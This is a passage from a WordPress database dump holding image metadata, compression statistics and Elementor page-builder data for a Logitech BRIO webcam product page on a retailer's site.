ng'),(5813,2990,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:28:\"2019/03/briopictograms-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"briopictograms-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5814,2990,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.1414274961731774027384744840674102306365966796875;s:5:\"bytes\";i:25333;s:11:\"size_before\";i:354733;s:10:\"size_after\";i:329400;s:4:\"time\";d:0.59999999999999997779553950749686919152736663818359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:14400;s:10:\"size_after\";i:14400;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:3366;s:11:\"size_before\";i:46338;s:10:\"size_after\";i:42972;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1610;s:11:\"size_before\";i:28754;s:10:\"size_after\";i:27144;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:8444;s:11:\"size_before\";i:97525;s:10:\"size_after\";i:89081;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.0999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:11913;s:11:\"size_before\";i:167716;s:10:\"size_after\";i:155803;s:4:\"time\";d:0.2200000000000000011102230246251565404236316680908203125;}}}'),(6146,1620,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(5833,2987,'_elementor_data','[{\"id\":\"a2dcd03\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_hover_background\":\"classic\"},\"elements\":[{\"id\":\"31ec800\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"740db1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH BRIO<\\/h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording<\\/p><ul><li>Spectacular video quality up to 4K<\\/li><li>Look great in any light with HDR and RightLight\\u2122 3<\\/li><li>Enhanced security with Windows Hello\\u2122<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"89e09c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9d928f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.png\",\"id\":2990},\"image_size\":\"medium_large\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1b40ef\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ffa8ec9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"acd0c54\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A NEW BENCHMARK FOR WEBCAMS<\\/h2><p>Step up to the world\\u2019s most technologically advanced webcam and get professional-quality video for video conferencing, streaming, or recording. Logitech BRIO is packed with features that produce stunning video in any environment. Our premier 4K ultra high-def camera offers 5x digital zoom, high frame rates, outstanding low-light performance, HDR, and RightLight\\u2122 3.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ab9e0f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f1b50b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"0b9f29a\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6a2832\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23ab01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"1ca51fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":62.581},\"elements\":[{\"id\":\"f2934d6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-1.jpg\",\"id\":2992}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ec48173\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":37.416},\"elements\":[{\"id\":\"bac33cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CAPTURE EVERY DETAIL IN 4K HD<\\/h3><p>Stream crystal-clear video with superb resolution, frame rate, color, and detail. Logitech BRIO delivers 4K Ultra HD at 30 fps or 1080p at either 30 or an ultra-smooth 60 fps for outstanding clarity, smoothness, and detail. Get a closer look with 5x zoom.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6738d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"811eef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f989bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>LOOK GREAT IN ANY LIGHT<\\/h3><p>Now you can use your video conferencing, streaming, and video recording applications in any lighting condition \\u2013 and always look your best. Whether in low light or bright sunshine, Logitech BRIO with RightLight\\u2122 3 and high dynamic range (HDR) technology adjusts to highlight the most important subject: you.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0a5f81\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"936ba59\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms.jpg\",\"id\":2993}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf2d1fc\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"a3a95ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":63.441},\"elements\":[{\"id\":\"5257f5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/briopictograms-2.jpg\",\"id\":2994}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8a03983\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":36.556},\"elements\":[{\"id\":\"46329a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURITY MEETS CONVENIENCE<\\/h3><p>Powered by both optical and infrared sensors, BRIO delivers fast and secure facial recognition for Windows Hello. No need to type a password for Windows 10: simply look into BRIO\\u2019s lens to login.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d4c77a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e3245b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-10},\"elements\":[{\"id\":\"50c4419\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"53bae29\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bb97b05\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"d8a48db\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"06ddb38\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ADJUSTABLE FIELD OF VIEW<\\/h4><p>Choose from three field of view settings to perfectly frame your video. For an ideal head and shoulders shot, pick 65 degrees. For larger groups or to capture more of the room, choose 78 or 90 degrees.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ff1e98e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ebfd48a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K RECORDING<\\/h4><p>Use BRIO with software like Camera for Windows 10, XSplit Broadcaster, OBS, and SwiftCapture to record in resolutions up to 4K.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eecae79\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5eff684\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SMOOTH STREAMING<\\/h4><p>BRIO retains a high frame rate whatever the lighting to match your gaming broadcast with no lag. Stream in full 1080p HD at up to 60 frames per second for smooth, fluid video that keeps up with your every move.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79b792d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b0c8920\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CERTIFIED FOR BUSINESS<\\/h4><p>BRIO is certified compatible with Skype for Business, Windows Hello, and Cisco Jabber\\u2122, works with Microsoft Cortana\\u00ae, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with BRIO.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c5081b\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"bde9d3c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"757c879\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MOUNTING &amp; PRIVACY OPTIONS<\\/h4><p>Mount the camera wherever it works best \\u2013 LCD screen, notebook, or tabletop \\u2013 with the adjustable clip, or mount BRIO on your own tripod instead. A removable shade flips down to assure privacy and peace of mind.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f194eff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a465257\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>5X HD ZOOM<\\/h4><p>Zoom in and pan around to crop out distracting backgrounds, perfectly frame you and a friend, or capture the entire scene. BRIO\\u2019s next-generation 4K image sensor delivers HD quality without jaggies or blur, even when zoomed in.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"343f7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cfec2a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>CAMERA SETTINGS<\\/h4><p>Customize your BRIO and access pan, zoom, and image controls with Logitech Camera Settings software for Windows and Mac.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"839ea48\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5824,2992,'_wp_attached_file','2019/03/briopictograms-1.jpg'),(5825,2992,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:28:\"2019/03/briopictograms-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"briopictograms-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"briopictograms-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5826,2992,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.66497979863135014966246671974658966064453125;s:5:\"bytes\";i:6250;s:11:\"size_before\";i:170533;s:10:\"size_after\";i:164283;s:4:\"time\";d:0.09000000000000001054711873393898713402450084686279296875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:398;s:11:\"size_before\";i:7335;s:10:\"size_after\";i:6937;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.1699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:742;s:11:\"size_before\";i:14350;s:10:\"size_after\";i:13608;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.100000000000000088817841970012523233890533447265625;s:5:\"bytes\";i:1790;s:11:\"size_before\";i:57700;s:10:\"size_after\";i:55910;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:646;s:11:\"size_before\";i:13092;s:10:\"size_after\";i:12446;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.560000000000000053290705182007513940334320068359375;s:5:\"bytes\";i:1097;s:11:\"size_before\";i:30789;s:10:\"size_after\";i:29692;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.339999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1577;s:11:\"size_before\";i:47267;s:10:\"size_after\";i:45690;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5827,2993,'_wp_attached_file','2019/03/briopictograms.jpg'),(5828,2993,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:26:\"2019/03/briopictograms.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"briopictograms-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"briopictograms-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"briopictograms-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"briopictograms-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"briopictograms-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"briopictograms-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"briopictograms-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5829,2993,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:4.19316482605797435923022931092418730258941650390625;s:5:\"bytes\";i:4655;s:11:\"size_before\";i:111014;s:10:\"size_after\";i:106359;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.63999999999999968025576890795491635799407958984375;s:5:\"bytes\";i:311;s:11:\"size_before\";i:5513;s:10:\"size_after\";i:5202;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.62000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:413;s:11:\"size_before\";i:8946;s:10:\"size_after\";i:8533;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1496;s:11:\"size_before\";i:37314;s:10:\"size_after\";i:35818;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.5999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:365;s:11:\"size_before\";i:7929;s:10:\"size_after\";i:7564;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:847;s:11:\"size_before\";i:19983;s:10:\"size_after\";i:19136;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.899999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:1223;s:11:\"size_before\";i:31329;s:10:\"size_after\";i:30106;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(5830,2994,'_wp_attached_file','2019/03/briopictograms-2.jpg'),(5831,2994,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:28:\"2019/03/briopictograms-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"briopictograms-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"briopictograms-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"briopictograms-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"briopictograms-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"briopictograms-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"briopictograms-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"briopictograms-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5832,2994,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.9815507092235922215195387252606451511383056640625;s:5:\"bytes\";i:3781;s:11:\"size_before\";i:94963;s:10:\"size_after\";i:91182;s:4:\"time\";d:0.0799999999999999877875467291232780553400516510009765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.0800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:269;s:11:\"size_before\";i:4422;s:10:\"size_after\";i:4153;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:450;s:11:\"size_before\";i:9029;s:10:\"size_after\";i:8579;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.680000000000000159872115546022541821002960205078125;s:5:\"bytes\";i:1156;s:11:\"size_before\";i:31420;s:10:\"size_after\";i:30264;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:360;s:11:\"size_before\";i:8135;s:10:\"size_after\";i:7775;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:657;s:11:\"size_before\";i:16799;s:10:\"size_after\";i:16142;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.529999999999999804600747665972448885440826416015625;s:5:\"bytes\";i:889;s:11:\"size_before\";i:25158;s:10:\"size_after\";i:24269;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(5834,2995,'_wp_page_template','template-fullwidth.php'),(5835,2995,'_elementor_edit_mode','builder'),(5836,2995,'_elementor_template_type','post'),(5838,2995,'_elementor_data','[{\"id\":\"a2dcd03\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_hover_background\":\"classic\"},\"elements\":[{\"id\":\"31ec800\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"740db1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH BRIO<\\/h2><p>Ultra HD Webcam for Video Conferencing, Streaming, and Recording<\\/p><ul><li>Spectacular video quality up to 4K<\\/li><li>Look great in any light with HDR and RightLight\\u2122 3<\\/li><li>Enhanced security with Windows 